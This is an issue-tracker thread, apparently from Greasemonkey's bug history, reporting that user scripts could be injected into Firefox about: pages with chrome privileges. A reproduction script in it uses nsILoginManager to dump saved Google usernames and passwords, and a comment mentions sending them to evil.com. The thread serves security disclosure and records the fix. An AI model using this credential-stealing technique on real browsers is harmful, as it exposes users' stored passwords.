Script injection attempted in about:addons

[Martii]

Original title: Script injection attempted in about:addons

In Firefox 4.x, Greasemonkey attempts to inject a script when @include rule is set to about:addons and user navigates to about:addons which also throws this warning

Warning: assignment to undeclared variable _createItemOrig
Source File: chrome://greasemonkey/content/addons4-overlay.js
Line: 16

Sample script

// ==UserScript==
// @name          about:addons test
// @namespace     http://localhost
// @description   Tests GMs injection on about:addons
// @include  about:addons
// @include http://www.iana.org/domains/example/
// ==/UserScript==

  alert('foo');

The monkey menu also reflects this attempt as being successfully injected however no alert happens. It is handy to have the popup menu available however it shouldn't reflect nor try to inject a script at this URI.

Mozilla/5.0 (X11; Linux x86_64; rv:2.0) Gecko/20100101 Firefox/4.0

[Martii]

Reported upstream at greasemonkey#1302

[Martii]

monkey menu has been completely refactored and broken as acknowledged in greasemonkey#1306 in this commit forward thus invalidated this report. Still present in GM 0.9.1 release.

Closing as invalidated by greasemonkey@4e5e3ec

[Martii]

Reported upstream in this comment as

monkey menu has been completely refactored and broken, as acknowledged in #1306, by this commit forward thus invalidated this report. Still present in GM 0.9.1 release.

Closing as invalidated-by would be a more proper tag along with commit reference.

[Martii]

Reopened by greasemonkey#1375

LouCypher wrote
Steps to reproduce:
1. Enable "greasemonkey.aboutIsGreaseable" in about:config (set it to true)
2. Install this script

// ==UserScript==
// @name            Retrieving passwords via about: pages
// @namespace       http://mozilla.status.net/loucypher
// @include         about:*
// ==/UserScript==

var hostname = 'https://www.google.com';
var formSubmitURL = 'https://www.google.com';  // not http://www.example.com/foo/auth.cgi
var httprealm = null;
var username, password;

try {
  var myLoginManager = Components.classes["@mozilla.org/login-manager;1"].
                        getService(Components.interfaces.nsILoginManager);
  var logins = myLoginManager.findLogins({}, hostname, formSubmitURL, httprealm);
  var info = "";
  for (var i = 0; i < logins.length; i++) {
    info += logins[i].username + "\n";
    info += logins[i].password + "\n\n";
  }
  //GM_log(info);
  alert(info); // show usernames and passwords for google.com
               // or send to evil.com via XHR (untested)
} catch(ex) {
  // This will only happen if there is no nsILoginManager component class
  //GM_log(ex);
}

Expected result:
User script should not have chrome privileges and should not have access to XPCOMs

Actual result:
Display usernames and passwords (could be worse)

Upstream comment

Historical issue reference:
#1302

[Martii]

Upstream comment

arantius wrote:
Still thinking we should just drop this feature (injecting into about:s besides blank) altogether.

In regards to security I am +1 for this. Moz and other addons are starting to create about: entries of their own and I would really rather not see user.js become a security threat to other add-ons including the Moz core. We could never really handle all of them especially if GM isn't aware of them. about:blank had some issues last time I tested it to with document.write but that was a while ago.

[Martii]

Closed by greasemonkey@80c62e8